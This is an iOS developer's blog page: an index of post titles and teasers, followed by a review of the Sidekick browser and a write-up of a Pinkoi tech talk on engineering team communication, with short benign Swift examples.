iOS/Web Developer @ Taipei / Taiwan 🇹🇼
ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.
ZMediumToMarkdown is a powerful tool that allows you to effortlessly download and convert your Medium posts to Markdown format.
ZReviewTender is a tool for fetching app reviews from the App Store and Google Play Console and integrating them into your workflow.
The Craft of Building a Handmade HTML Parser The development log of ZMarkupParser HTML to NSAttributedString rendering engine Tokenization conversion of HTML String, Normalization processing, gen...
Record of Practical Application of Design Patterns Record of problem scenarios encountered and solutions applied when encapsulating Socket.IO Client Library requirements using Design Patterns P...
The Past and Present of iOS Privacy and Convenience Apple’s privacy principles and the adjustments to privacy protection features in iOS over the years Theme by slidego [2023–08–01] iOS 17 Upda...
Behavior Change in Merging NSAttributedString Attributes Range in iOS ≥ 18 Starting from iOS ≥ 18, merging NSAttributedString attributes Range will reference Equatable Photo by C M Issue Origin...
Practical Application Record of Design Patterns—In WKWebView with Builder, Strategy & Chain of Responsibility Pattern Scenarios of using Design Patterns (Strategy, Chain of Responsibility, Bui...
[Travelogue] 2024 Bangkok 🇹🇭 5-Day Free and Easy Trip Returning to Thailand after the pandemic, a quick 5-day free and easy trip to Bangkok. Memories of Bangkok Going back to 2018, it was the ...
[iOS] Temporary Workaround for Black Launch Screen Bug After Several Launches Temporary workaround to solve Xcode Build & Run app black screen issue Photo by Etienne Girardet Issue I don’…
iOS Shortcut Automation Scenarios - Automatically Forwarding Text Messages and Creating Reminder Tasks iOS uses Shortcuts to easily automate forwarding specific text messages to Line and automatic...
iOS Vision framework x WWDC 24 Discover Swift enhancements in the Vision framework Session Vision framework review & trying out new Swift API in iOS 18 Photo by BoliviaInteligente Topic ...
Medium Partner Program is finally open to global (including Taiwan) writers! Everyone can join the Medium Partner Program to earn revenue by writing articles. Photo by Steve Johnson Murmur Th...
All About iOS UUID (Swift/iOS ≥ 6) iPlayground 2018 Recap & All About UUID Introduction: Last Saturday and Sunday, I attended the iPlayground Apple software developer conference. This event ...
[Deprecated] Enhance User Experience by Adding 3D TOUCH to Your iOS APP (Swift) iOS 3D TOUCH Application [Deprecated] 2020/06/14 3D Touch functionality has been removed in iPhone 11 and later...
Exploring iOS 12 CoreML — Automatically Predict Article Categories Using Machine Learning, Even Train the Model Yourself! Explore CoreML 2.0, how to convert or train models and apply them in real ...
Exploring Vision — Automatic Face Detection and Cropping for Profile Pictures (Swift) Practical Application of Vision [2024/08/13 Update] Refer to the new article and API: “iOS Vision framewor...
iOS ≥ 10 Notification Service Extension Application (Swift) Image push notifications, push notification display statistics, pre-processing before push notification display Regarding the basics of...
iOS UITextView Text Wrapping Editor (Swift) Practical Route Target Functionality: The app has a discussion area where users can post articles. The interface for posting articles needs to support...
The Beginning is Always the Hardest It has been over 4 years since I last managed a blog. The remaining ad revenue of US$88 has been stuck there. Recently, I discovered that I could request to can...
Research on Preloading and Caching Page and File Resources in iOS WKWebView Study on improving page loading speed by preloading and caching resources in iOS WKWebView. Photo by Antoine Gravier ...
[Travelogue] 2024 Second Visit to Kyushu 9-Day Free and Easy Trip, Entering Japan via Busan→Fukuoka Cruise Boarding the Shin Arashiyama Camellia Cruise from Busan, South Korea to Fukuoka, Japan, v...
[iOS] Exploring the Use of NSTextList or NSTextTab for List Indentation with NSAttributedString Implementing list indentation similar to HTML List OL/UL/LI using NSTextList or NSTextTab with NSAtt...
Plane.so Docker Self-Hosted Setup Record Plane Self-Hosted Docker setup, backup, restore, Nginx Domain reverse proxy configuration tutorial Introduction Plane.so is a free open-source project ...
Plane.so Free Open Source and Self-Hosted Support Project Management Tool Similar to Asana/Jira Introduction to the use of Plane.so project management tool with Scrum process Background Asana ...
What Can Be Done to Commemorate When an App Product Reaches Its End? Using mitmproxy + apple configurator to keep an App in its pre-removal state forever Introduction Jujutsu Kaisen After wor...
Implementing Google Services RPA Automation with Google Apps Script Implementing Robotic Process Automation for Google Workspace services using Google Apps Script Photo by Possessed Photography...
Slack & ChatGPT Integration Build your own ChatGPT OpenAI API for Slack App (Google Cloud Functions & Python) Background Recently, I have been promoting the use of Generative AI within t...
[Travelogue] 2023 Hiroshima Okayama 6-Day Free Trip 6-day trip to Hiroshima, Okayama, Fukuyama, Kurashiki, and Onomichi in 2023 Preface After resigning at the end of August and immediately embar...
[Travelogue] 2023 Kyushu 10-Day Solo Trip Record of a 10-day solo trip to Fukuoka, Nagasaki, and Kumamoto in Kyushu [2024 Update] Second Visit to Kyushu Visited Kyushu for the second time in J...
[Travelogue] 9/11 Nagoya One-Day Flash Free Travel Peach Aviation Nagoya One-Day Flash Ticket Travel Experience Background A round-trip ticket for a day trip to Nagoya is an activity launched by...
[POC] App End-to-End Testing Local Snapshot API Mock Server Verification of the feasibility of implementing E2E Testing for existing apps and existing API architecture Photo by freestocks Intro...
Using Google Apps Script to Create a Free Github Repo Star Notifier in Three Steps Writing GAS to connect Github Webhook and forward star notifications to Line Introduction As a maintainer of op...
[Travelogue] 2023 Tokyo 5-Day Free and Easy Trip Record and travel information for a 5-day free and easy trip to Tokyo in June 2023, following the Kansai region trip last month. 2023/05 Kansai Re...
[Travelogue] 2023 Kansai 8-Day Free and Easy Trip Record of an 8-day free and easy trip to Kyoto, Osaka, and Kobe in May 2023, including information on food, accommodation, and transportation. Pr...
ZMediumToJekyll Move your Medium posts to a Jekyll blog and keep them in sync in the future. This tool can help you move your Medium posts to a Jekyll blog and keep them in sync in the future...
ZMarkupParser HTML String to NSAttributedString Tool Convert HTML String to NSAttributedString with corresponding Key style settings ZhgChgLi / ZMarkupParser ZhgChgLi / ZMarkupParser Featur...
Pinkoi 2022 Open House for GenZ — 15 Mins Career Talk Pinkoi Developers’ Night 2022 Year-End Exchange Meeting — 15 Minutes Career Sharing Talk Pinkoi Developers’ Night 2022 Year-End Exchange Meet...
ZReviewTender — Free Open Source App Reviews Monitoring Bot Real-time monitoring of the latest app reviews and providing instant feedback to improve collaboration efficiency and consumer satisfact...
App Store Connect API Now Supports Reading and Managing Customer Reviews App Store Connect API 2.0+ comprehensive update, supports In-app purchases, Subscriptions, Customer Reviews management 202...
Painless Migration from Medium to Self-Hosted Website Migrating Medium content to Github Pages (with Jekyll/Chirpy) zhgchg.li Background In the fourth year of running Medium, I have accumulate...
iOS: Insuring Your Multilingual Strings! Using SwiftGen & UnitTest to ensure the safety of multilingual operations Photo by Mick Haupt Problem Plain Text Files iOS handles multilingual su...
Visitor Pattern in TableView Enhancing the readability and extensibility of TableView using the Visitor Pattern Photo by Alex wong Introduction Following the previous article on “Visitor Patt...
Implementing iOS NSAttributedString HTML Render Yourself An alternative to iOS NSAttributedString DocumentType.html Photo by Florian Olivo [TL;DR] 2023/03/12 Re-developed using another method ...
Converting Medium Posts to Markdown Writing a small tool to back up Medium articles & convert them to Markdown format ZhgChgLi / ZMediumToMarkdown [EN] ZMediumToMarkdown I’ve written a pro...
Crashlytics + Google Analytics Automatically Query App Crash-Free Users Rate Using Google Apps Script to query Crashlytics through Google Analytics and automatically fill it into Google Sheet ...
Crashlytics + Big Query: Creating a More Immediate and Convenient Crash Tracking Tool Integrating Crashlytics and Big Query to automatically forward crash records to a Slack Channel Results ...
2021 Pinkoi Tech Career Talk - Decoding the High-Efficiency Engineering Team Decoding the high-efficiency engineering team at Pinkoi Tech Talk Decoding the High-Efficiency Engineering Team 202...
Using Google Apps Script to Forward Gmail Emails to Slack Use Gmail Filter + Google Apps Script to automatically forward customized content to Slack Channel when receiving emails Photo by Lukas...
[Productivity Tools] Abandon Chrome and Embrace Sidekick Browser Introduction and Experience with Sidekick Browser 2024 Update Around early 2023, I switched to using Arc Browser! The user experi...
Leading Snowflakes — Reading Notes “Leading Snowflakes The Engineering Manager Handbook” — Oren Ellenbogen Entering a management position for the first time can be very confusing; the knowledge...
Visitor Pattern in Swift (Share Object to XXX Example) Analysis of the practical application scenarios of the Visitor Pattern (sharing items like products, songs, articles… to Facebook, Line, Link...
Building a Fully Automated WFH Employee Health Reporting System with Slack Enhancing work efficiency by playing with Slack Workflow combined with Google Sheet with App Script Photo by Stephen P...
ZReviewsBot — Slack App Review Notification Bot Free and open-source iOS & Android APP latest review tracking Slack Bot TL;DR [2022/08/10] Update: Now redesigned using the new App Store Conn...
AppStore APP’s Reviews Slack Bot Insights Using Ruby+Fastlane-SpaceShip to build an APP review tracking notification Slack bot Photo by Austin Distel Ignorance is bliss AppReviewBot as an ex...
Quickly Build a Testable API Service Using Firebase Firestore + Functions When push notification statistics meet Firebase Firestore + Functions Photo by Carlos Muza Introduction Accurate Push N...
Password Recovery SMS Verification Code Security Issue Demonstrating the severity of brute force attacks using Python Photo by Matt Artz Introduction This article doesn’t contain much technica...
Bye Bye 2020: A Review of the Second Year on Medium A very late review of 2020 Image taken from the official poster of Simple Life Festival 2020, where I served as an iOS Developer for StreetVo...
Medium Custom Domain Feature Returns Take care of your Domain Authority yourself! [2024/07/28] Feature Returns A series of ups and downs, this feature was opened in 2012, then closed; reopen...
Revealing a Clever Website Vulnerability Discovered Years Ago Website security issues caused by multiple vulnerabilities combined Photo by Tarik Haiga Introduction A few years ago, while still...
Using Python+Google Cloud Platform+Line Bot to Automate Routine Tasks Creating a daily automatic check-in script using a check-in reward app as an example Photo by Paweł Czerwiński Origin I ha...
[Reinstallation Note 1] - Laravel Homestead + phpMyAdmin Environment Setup Setting up a Laravel development environment from scratch and managing MySQL databases with phpMyAdmin GUI Laravel ...
What’s New with Universal Links iOS 13, iOS 14 What’s New with Universal Links & Setting Up a Local Testing Environment Photo by NASA Preface For a service that has both a website and an ...
iOS Cross-Platform Account and Password Integration to Enhance Login Experience A feature more worthwhile than Sign in with Apple Photo by Dan Nelson Features One of the most common problems i...
Comprehensive Guide to Implementing Local Cache with AVPlayer AVPlayer/AVQueuePlayer with AVURLAsset implementing AVAssetResourceLoaderDelegate Photo by Tyler Lastovich [2023/03/12] Update I...
[Old] AVPlayer Real-time Cache Implementation Understanding the implementation of AVPlayer/AVQueuePlayer with AVURLAsset using AVAssetResourceLoaderDelegate [2021–01–31] Article Announcement: Art...
iOS APP Version Numbers Explained Version number rules and comparison solutions Photo by James Yarema Introduction All iOS APP developers will encounter two numbers, Version Number and Build N...
Apple Watch Original Stainless Steel Milanese Loop Unboxing Apple Original Stainless Steel 44mm Graphite Milanese Loop Unboxing Following the previous post “Apple Watch Series 6 Unboxing & Tw...
Apple Watch Series 6 Unboxing & Two-Year Usage Experience Apple Watch Series 6 Unboxing and Buying Guide & Two-Year Usage Experience Summary Preface Time flies, it’s been two years since...
Write Shell Script Directly in Swift with Xcode! Introducing Localization multi-language and Image Assets missing check, using Swift to create Shell Script Photo by Glenn Carstens-Peters Backgr...
iOS 14 Clipboard Data Theft Panic: The Dilemma of Privacy and Convenience Why do so many iOS apps read your clipboard? Photo by Clint Patterson ⚠️ 2022/07/22 Update: iOS 16 Upcoming Changes St...
Real-World Codable Decoding Issues (Part 2) Handling Response Null Fields Reasonably, No Need to Always Rewrite init decoder Photo by Zan Introduction Following the previous article “Real-Worl...
Is it Still Up-to-Date to Build a Personal Website Using Google Site? New Google Site Personal Website Building Experience and Setup Tutorial Update 2022–07–17 Currently, I have used my self-w...
Real-world Decode Issues with Codable (Part 1) From basic to advanced, deeply using Decodable to meet all possible problem scenarios Photo by Gustas Brazaitis Preface Due to the backend API up...
Easily Create a ‘Fake’ Transparent Perspective Wallpaper Using iPhone Using iMovie’s green screen keying feature to composite videos Anyway, I’m Bored Working during the day, exploited by capita...
Creating a Comfortable WFH Smart Home Environment, Control Appliances at Your Fingertips Demonstrating the use of Raspberry Pi as a HomeBridge host to connect all Mi Home appliances to HomeKit ...
Exploring Methods for Implementing iOS HLS Cache How to achieve caching while playing m3u8 streaming video files using AVPlayer photo by Mihis Alex [2023/03/12] Update The next article, “Com...
First Experience with iOS Reverse Engineering Exploring the process from jailbreaking, extracting iPA files, shelling, to UI analysis, injection, and decompilation About Security The only thing ...
iOS Expand Button Click Area Rewrite pointInside to expand the touch area In daily development, it is often encountered that after arranging the UI according to the design, the screen looks beaut...
Medium One-Year Review A review of one year on Medium or a summary of 2019 In the blink of an eye, it’s been a year since I started publishing articles on Medium. The actual anniversary should be...
Mi Home APP / Xiao Ai Speaker Region Issues Newly purchased Xiaomi Air Purifier 3 & recording the linkage issues between Mi Home and Xiao Ai Speaker Preface This is the fourth article about ...
iOS UIViewController Transition Techniques Complete guide to pull-down to close, pull-up to appear, and full-page right swipe back effects in UIViewController Introduction I’ve always been cur...
iOS Deferred Deep Link Implementation (Swift) Build an app transition flow that adapts to all scenarios without interruption [2022/07/22] Update on iOS 16 Upcoming Changes Starting from iOS ≥ 16...
Using ‘Shortcuts’ Automation with Mi Home Smart Home on iOS ≥ 13.1 Automate operations directly using the built-in Shortcuts app on iOS ≥ 13.1 Introduction In early July this year, I bought two ...
New Xiaomi Smart Home Purchases AI Speaker, Temperature and Humidity Sensor, Scale 2, DC Inverter Fan Usage Experience Getting Started Following the previous post “Smart Home First Experience — ...
What was the experience of iPlayground 2019 like? Hot participation experience of iPlayground 2019 About the event Last year it was held in mid-October, and I also started running Medium to reco...
The APP uses HTTPS for transmission, but the data was still stolen. Using mitmproxy on iOS+MacOS to perform a Man-in-the-middle attack to sniff API transmission data and how to prevent it? Introd...
How to Create an Engaging Engineering CTF Competition Building and brainstorming for Capture The Flag competitions About CTF Capture The Flag, abbreviated as CTF, is a game originating from the ...
Apple Watch Case Unboxing Experience (Catalyst & Muvit) Catalyst Apple Watch Ultra-Thin Waterproof Case & Muvit Apple Watch Case [Latest Update] Apple Watch Series 6 Unboxing & Two...
First Experience with Smart Home - Apple HomeKit & Xiaomi Mijia Mijia Smart Camera and Mijia Smart Desk Lamp, Homekit Setup Tutorial [2020/04/20] Advanced Tutorial Released : Experienced use...
AirPods 2 Unboxing and Hands-On Experience (Laser Engraved Version) More ingenious, incredibly amazing. [Latest] Apple Watch Series 6 Unboxing & Two-Year Experience >>>Click Here Whe...
Perfect Implementation of One-Time Offers or Trials in iOS (Swift) iOS DeviceCheck follows you everywhere While writing the previous Call Directory Extension, I accidentally discovered this obscu...
Identify Your Own Calls (Swift) iOS DIY Whoscall Call Identification and Phone Number Tagging Features Origin I have always been a loyal user of Whoscall. I used it when I originally had an Andr...
iOS tintAdjustmentMode Property Issue with .tintColor setting failing when presenting UIAlertController on this page’s Image Assets (Render as template) Comparison Before and After Fix No length...
Let’s Build an Apple Watch App! (Swift) Step-by-step development of an Apple Watch App from scratch with watchOS 5 [Latest] Apple Watch Series 6 Unboxing & Two-Year Experience >>>Cli...
Apple Watch Series 4 Unboxing: Comprehensive Review from Unboxing to Mastery (Updated 2020–10–24) Why buy it? Is it useful? What’s good about it? How to use it? & WatchOS APP recommendations ...
Add ‘App Notification Settings Page’ Shortcut in User’s ‘Settings’ on iOS ≥ 12 (Swift) Besides turning off notifications from the system, give users other options Following the previous three art...
Always Keep the Enthusiasm for Exploring New Things The life opportunity from stepping into the information field to switching to iOS APP development Bangkok 2018 - Z Realm — You are not alone ...
Handling Push Notification Permission Status from iOS 9 to iOS 12 (Swift) Solution for handling notification permission status and requesting permissions from iOS 9 to iOS 12 What to do? Followi...
What? iOS 12 Can Send Push Notifications Without User Authorization (Swift) — (Updated 2019-02-06) Introduction to UserNotifications Provisional Authorization and iOS 12 Silent Notifications MurM...
Introduction and Experience with Sidekick Browser
Around early 2023, I switched to using Arc Browser! The user experience and features are better, with fewer bugs, and it also supports cross-device synchronization.
Here’s a link to download Arc, the browser I was telling you about!
I learned about Sidekick Browser from a colleague. To be honest, I didn’t have high expectations at first. Over the years, I have considered abandoning Chrome and tried Safari, Safari beta, Firefox, Opera, and third-party browsers based on open-source cores. However, these attempts failed repeatedly, and I ended up switching back to Chrome within a few days. Another reason is that I haven’t actively followed the browser market, so there may have been browsers that met my needs, but I was unaware of them.
The main reason is that my frequently used extensions are not fully supported. I was too reliant and accustomed to Chrome’s extensions. Even though browsers based on the Chromium core could support them seamlessly, they lacked standout features and the experience was similar to using Google Chrome.
Regarding productivity features, Chrome’s extension library offers millions of tools that can be used. By searching and combining them, one can achieve the desired results. However, without conducting research, I am not sure which processes and features are truly beneficial for productivity.
Applications can be quickly added from the homepage, or added manually from a Tab by entering the URL and an icon image.
Sidekick has built-in hundreds of productivity tool websites that can be quickly added to the Application.
If the Application added from the homepage does not appear on the left Sidebar, you can drag it over yourself.
Right-click on the Application to quickly view recent visits, and also support switching between multiple accounts.
There are not many websites supported for multiple account switching. If not supported, you can use Private Mode first; currently tested to support Slack and Notion.
Each App can be individually configured, such as turning off notifications, turning off Badges, and so on.
Although macOS has a built-in window-splitting feature, I actually use it very rarely; unless I want to fully focus, most of the time I need to browse content while using other macOS apps, and that is when the browser's own split-view feature becomes very useful!
For example, you can attend online classes and take notes at the same time.
You can freely drag and adjust the size of the middle separator.
To use, just click on the window split button in the upper right corner of the browser, choose the window to add to the left, and click again to close the split.
Similar to MacOS’s Spotlight, you can press “Option” + “f” for full browser search in any window.
Similar to the popular Tab Saver extension on Chrome, it can quickly save the currently open Tab web pages and switch between them, making it easy for us to manage different work states.
Click on the “F” (First Session) in the lower left corner to enter the Session management page.
Click on “Add new session” at the top to save the current Tab state and open a completely new browsing environment.
You can switch between Sessions, click “Activate” to restore the Tab.
Sessions will not affect the Applications enabled on the left.
From now on, as long as a communication service offers a web version, you can use it directly as a Sidekick Application without installing a desktop app; as mentioned earlier, Application notifications are just as instant and complete as a desktop app's.
Integrated with Google Keep cloud note-taking feature, click on the document icon in the lower left corner to quickly open Google Keep for note-taking.
Google Keep is stored in the cloud Google account, supporting cross-platform and cross-device note synchronization.
You can use this feature to quickly record items.
I am not sure whether this will be replaced by their own Sidekick Sync in the future; after all, that would give them more room for optimization and integration.
With the wave of privacy concerns, major companies are starting to focus on user privacy. Apple, as the main driver, has begun building privacy protection features into new versions of Safari. However, since Google Ads is the biggest beneficiary of personal data, it may be hard to expect similar changes in Google Chrome.
Chromium != Chrome, Chromium is an open-source project at the core of browser technology.
Although Chromium is also led by Google, its open-source nature allows any developer to optimize based on this core. Sidekick also utilizes this method to optimize on the Chromium base, retaining Chrome’s features while enhancing functionalities lacking in Chrome.
More features waiting for you to explore and experience!
“It is a sin for a company not to make money. (If you don’t make money, it is a sin against society because we take society’s funds, attract society’s talents, and without sufficient surplus, we are wasting valuable resources that could be more effectively utilized elsewhere.)” - Panasonic founder, Konosuke Matsushita (text reference from the Business Thought Institute)
A good product needs good cash flow to provide better services and to last longer. Below are the pricing details for Sidekick:
For personal use, the free plan is more than sufficient, but if you are able, consider supporting the development team!
After using it for a while, due to the painless transition, I have completely abandoned Chrome. There is nothing that I must go back to Chrome for, and the best part is the Applications on the left, where I can add frequently used websites for quick access and notifications.
In the past, I would get lost in a clutter of tabs, or could only use the Pin Tab feature to keep important work services pinned at the front. However, switching was still painful and required searching.
Now, when I need to do a Code Review, I click on Github; when I need to submit an App, I click on App Store Connect; when I need to view a project, I click on Asana. Working is very efficient.
Regarding memory management, I haven’t done any specific research or testing, so I’m not sure about the optimization effect, but having it is better than not having it.
The only worry is that this product is still too new, and it’s uncertain how far it can go. If mismanagement occurs, development and maintenance may stop, which would be a great loss! So please promote and support it vigorously!
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Decoding the high-efficiency engineering team at Pinkoi Tech Talk
2021/09/08 19:00 @ Pinkoi x Yourator
My Medium: ZhgChgLi
Pinkoi’s work is composed of multiple Squads:
Each Squad is composed of various function teammates, including PM, Product Designer, Data, Frontend, Backend, iOS, Android, etc.; long-term and ongoing work goals are accomplished by the Squad.
In addition to Squads, there are also cross-team Projects that run, mostly short to medium-term work goals, where the initiator or any team member can act as the Project Owner, and the task is closed upon completion.
At the end, there is also how Pinkoi’s culture supports teammates in solving problems, if friends who are not interested in the actual content can directly scroll to the bottom of the page to view this section.
Let's start with the relationship between team growth and work efficiency. I have gone from a startup of about 10 people to a team of hundreds (I have not yet been challenged by thousands), and just the jump from 10 to 100, a 10x difference, is already significant in many aspects.
With fewer people, communication and handling things are quick; discussing and resolving issues in person can be done swiftly, as the “human connection” is strong, enabling synchronous collaboration.
However, in situations with more people, direct communication becomes challenging because with more collaborators, each discussion can take up a whole morning; and with many people collaborating, tasks need to be prioritized, and non-urgent matters cannot be addressed immediately, requiring asynchronous waiting to work on other tasks.
Having more diverse roles join can lead to more specialized work division, increased productivity or quality, and faster output.
But as mentioned earlier, conversely; there will be more collaboration with people, which means more time spent on communication.
Moreover, small issues get magnified. For example, if one person used to spend 10 minutes a day on a task like posting reports, it was manageable; but with, say, 20 people, it multiplies, and more than 3 hours a day go into posting reports. Optimizing and automating this task becomes valuable at that point, saving over 3 hours daily that would otherwise add up to more than 750 wasted hours a year.
As the team size grows, for the App Team, there are these roles that collaborate more closely.
Backend — API, Product Designer — UI, these do not need to be mentioned, Pinkoi is an international product, so all functional texts need to be translated by the Localization Team. Also, because we have a Data Team doing data collection and analysis, besides developing features, we also need to discuss event tracking points with the Data Team.
Customer Service is also a team that frequently interacts with us. Besides users sometimes directly providing feedback on order issues through the marketplace, more often users leave a one-star rating saying they encountered a problem. At this time, we also need the customer service team to help with in-depth inquiries, such as what problem did you encounter? How can we help you?
With so many collaborative relationships mentioned above, it means there are many communication opportunities.
However, remember, we are not avoiding or minimizing communication as much as possible; excellent engineers also need good communication skills.
What we need to focus on is important communication, such as brainstorming, discussing requirements, content, and schedules; do not waste time on confirming repetitive issues or vague communication. Avoid situations where you ask me, I ask him, and so on.
Especially in the era of the pandemic, communication time is precious and should be spent on more valuable discussions.
“I thought you thought what I thought” — this sentence perfectly illustrates the consequences of unclear communication.
Not just in work, in daily life, we often encounter misunderstandings due to different perceptions, and in life, harmony relies on mutual understanding; but in work, it’s different. If different perceptions are not discussed in depth, it’s easy to find out during the production stage that things are not as expected.
The idea introduced here is to communicate through a consensus "interface", similar to the Dependency Inversion Principle in the SOLID principles of object-oriented programming (it's okay if you are not familiar with it); the same concept can be applied to communication.
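As a rough code analogy (my own sketch, not from the talk itself), the "interface" is like a protocol both sides agree on first; each side then depends only on the protocol rather than on the other side's implementation details:

```swift
// Hypothetical example: both sides agree on this "interface" up front.
protocol ReviewProvider {
    func latestReviews() -> [String]
}

// The implementation can change freely without breaking the consumer,
// as long as the agreed-upon protocol stays the same.
struct AppStoreReviewProvider: ReviewProvider {
    func latestReviews() -> [String] {
        ["Great app!", "Crashes on launch"]
    }
}

struct ReviewReporter {
    let provider: ReviewProvider // depends only on the abstraction

    func report() {
        provider.latestReviews().forEach { print($0) }
    }
}
```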
The first step is to identify areas of communication that are unclear, need to be confirmed repeatedly, or require specific communication to be more focused and effective, or even situations where this delivery does not require additional communication.
Once the issues are identified, you can define an “interface.” An interface is a medium, which can be a document, process, checklist, tool, etc.
Use this “interface” as a bridge for communication between each other. There can be multiple interfaces, use the appropriate interface for each scenario; when encountering the same scenario, prioritize using this interface for initial communication. If further communication is needed, it can be based on this interface for focused discussion of the issues.
Here are 4 examples of interface communication in collaboration with the App Team:
For how to use the API, if we simply hand the API Response String to the App Team, there can be areas of ambiguity; for example, how do we know whether date refers to Register Date or Birthday? Also, the scope is broad, and many fields need confirmation.
This communication is also repetitive, requiring confirmation each time there is a new endpoint.
This is a classic case of ineffective communication.
Pinkoi uses Python (FastAPI) to automatically generate documentation from the API code; with PHP you can use Swagger (my previous company's practice). The advantage is that the document's structure and data formats are generated from the code itself, reducing maintenance costs; only the field descriptions need to be written by hand.
p.s. Currently, new Python 3 code uses FastAPI, and the old parts will be migrated gradually; for now, Postman is used as the communication interface.
The second one is collaborating with the Product Designer, which is similar to the Backend in principle, but the focus shifts to confirming UI Spec and Flow.
If color codes and fonts are scattered everywhere, our app suffers too. Even setting aside cases where the requirements really are specified that way, we don't want situations where the same kind of title uses a slightly different color code, or the UI at the same position is inconsistent.
The most basic solution is to have the designer organize the UI components library, establish a Design System (Guideline), and mark them when designing UI.
Based on the Design System (Guideline), we create the corresponding Fonts, Colors, Buttons, and Views in the code base, following the component library. When building screens, we use these established components, which makes it easy to quickly match the UI design drafts.
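A minimal sketch of what such design-system components might look like in the code base (the names BrandColor, BrandFont, and TitleLabel are hypothetical, not Pinkoi's actual ones):

```swift
import UIKit

// Hypothetical design tokens mirroring the designer's guideline.
enum BrandColor {
    static let primary = UIColor(red: 0.93, green: 0.35, blue: 0.38, alpha: 1) // "Primary/500"
    static let textTitle = UIColor(white: 0.13, alpha: 1)                      // "Text/Title"
}

enum BrandFont {
    static let title = UIFont.systemFont(ofSize: 18, weight: .semibold)
    static let body = UIFont.systemFont(ofSize: 14, weight: .regular)
}

// A reusable component built from the tokens, used instead of ad-hoc styling.
final class TitleLabel: UILabel {
    override init(frame: CGRect) {
        super.init(frame: frame)
        font = BrandFont.title
        textColor = BrandColor.textTitle
    }

    required init?(coder: NSCoder) {
        super.init(coder: coder)
        font = BrandFont.title
        textColor = BrandColor.textTitle
    }
}
```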
However, this is easy to let slip and needs to be adjusted dynamically: it should not try to cover too many exceptions, but it also should not be so rigid that it cannot grow.
p.s. Collaboration with Product Designers at Pinkoi is mutual, where Developers can also suggest better practices and discuss with Product Designers.
The third one is the interface with Customer Service. Product reviews are crucial for products in the marketplace, but it involves a very manual and repetitive communication process.
Because we need to manually check for new reviews from time to time, and if there are customer service issues, we need to forward the issues to customer service for assistance, which is repetitive and manual.
The best solution is to automatically synchronize marketplace reviews to our work platform. You can spend $ to buy existing services or use my developed ZhgChgLi / ZReviewTender (2022 New).
For deployment methods, tutorials, and technical details, refer to: ZReviewTender - Free and Open-source App Reviews Monitoring Bot
This bot is our communication interface. It will automatically forward reviews to a Slack Channel, allowing everyone to quickly receive the latest review information, track, and communicate on it.
The last example is the dependency on the Localization Team’s work; whether it’s a new feature or modifying old translations, we need to wait for the Localization Team to complete the work and hand it over to us for further assistance.
The cost of developing our own tools is too high, so we directly use third-party services to help us break the dependency.
All translations and keys are managed by third-party tools. We just need to define the keys in advance, and both sides can work separately. As long as the work is completed before the deadline, there is no need for mutual reliance. After the Localization Team completes the translation, the tool will automatically trigger a git pull to update the latest text files in the project.
p.s. Pinkoi has had this process since very early on, using Onesky at that time, but in recent years, there are more excellent tools available, which you can consider adopting.
We talked about external factors, now let’s talk about internal factors.
When there are fewer people or when one developer maintains a project, you can do whatever you want. You have a high level of mastery and understanding of the project, which is fine. Of course, if you have a good sense, even if it’s a one-person project, you can handle all the things mentioned here.
But as the number of collaborating teammates increases, everyone is working under the same project. If everyone still works separately, it will be a disaster.
For example, making API calls differently in different places, constantly reinventing the wheel and wasting time, or simply not caring and shipping something haphazardly: all of these incur significant costs in future maintenance and scalability.
Within the team, rather than calling it an interface, I think it’s too formal; it should be about consensus, resonance, and a sense of teamwork.
The most basic and common topic is Coding Style: naming conventions, where things should live, how Delegates are used, and so on. You can use common tools such as realm/SwiftLint for enforcement, and for multilingual strings you can use freshOS/Localize for organization (of course, if you already manage them with a third-party tool as mentioned earlier, you may not need this).
The second is the App architecture, whether it’s MVC/MVVM/VIPER/Clean Architecture, the key point is cleanliness and consistency; no need to pursue being trendy, just be consistent.
The Pinkoi App Team uses Clean Architecture.
Previously at StreetVoice, it was purely MVC but clean and consistent, making collaboration smooth.
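As a rough illustration of what an agreed architecture buys (my own minimal sketch, not Pinkoi's actual code), the point is that everyone puts the same kind of logic in the same kind of place:

```swift
// Hypothetical Clean Architecture-style layering; the names are illustrative only.
struct Product {
    let id: String
    let title: String
}

// Domain layer: what the app can do, independent of frameworks.
protocol FetchProductsUseCase {
    func execute(completion: @escaping ([Product]) -> Void)
}

// Data layer: how the data is actually obtained (API, cache, ...).
protocol ProductRepository {
    func products(completion: @escaping ([Product]) -> Void)
}

struct DefaultFetchProductsUseCase: FetchProductsUseCase {
    let repository: ProductRepository

    func execute(completion: @escaping ([Product]) -> Void) {
        repository.products(completion: completion)
    }
}

// Presentation layer: the ViewModel only talks to the use case.
final class ProductListViewModel {
    private let fetchProducts: FetchProductsUseCase
    private(set) var items: [Product] = []

    init(fetchProducts: FetchProductsUseCase) {
        self.fetchProducts = fetchProducts
    }

    func load(completion: @escaping () -> Void) {
        fetchProducts.execute { [weak self] products in
            self?.items = products
            completion()
        }
    }
}
```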
Next is UnitTest. With many people involved, it's hard to prevent the logic you are working on from being broken accidentally by someone else; writing more tests provides an extra layer of protection.
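A minimal sketch of such a protecting test (PriceFormatter is a made-up example, not real project code):

```swift
import Foundation
import XCTest

// A tiny piece of shared logic that several teammates might touch.
struct PriceFormatter {
    static func display(_ cents: Int) -> String {
        "$" + String(format: "%.2f", Double(cents) / 100)
    }
}

// The test guards the behavior so someone else's refactoring doesn't silently break it.
final class PriceFormatterTests: XCTestCase {
    func testDisplayFormatsCentsAsDollars() {
        XCTAssertEqual(PriceFormatter.display(199), "$1.99")
        XCTAssertEqual(PriceFormatter.display(0), "$0.00")
    }
}
```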
Lastly, there’s the aspect of documentation, about the team’s work processes, specifications, or operation manuals, making it easy for teammates to quickly refer to when they forget, and for new members to quickly get up to speed.
Besides the Code Level interface, there are other interfaces in collaboration to help us improve efficiency.
The first is having a Request for Comments stage before implementing requirements, where the developer in charge roughly explains how this requirement will be implemented, and others can provide comments and ideas.
In addition to preventing reinventing the wheel, it can also gather more ideas, such as how others might expand in the future, or what requirements to consider later on… etc., as onlookers see more clearly than those involved.
The second is to conduct thorough Code Reviews, checking if our interface consensus is being implemented, such as: Naming conventions, UI layout methods, Delegate usage, Protocol/Class declarations… etc. Also, checking if the architecture is being misused or rushed due to time constraints, assuming the development direction should move towards full Swift development, and whether there are still Objective-C code being used… etc.
The main focus is on reviewing these aspects, with functionality correctness being secondary assistance.
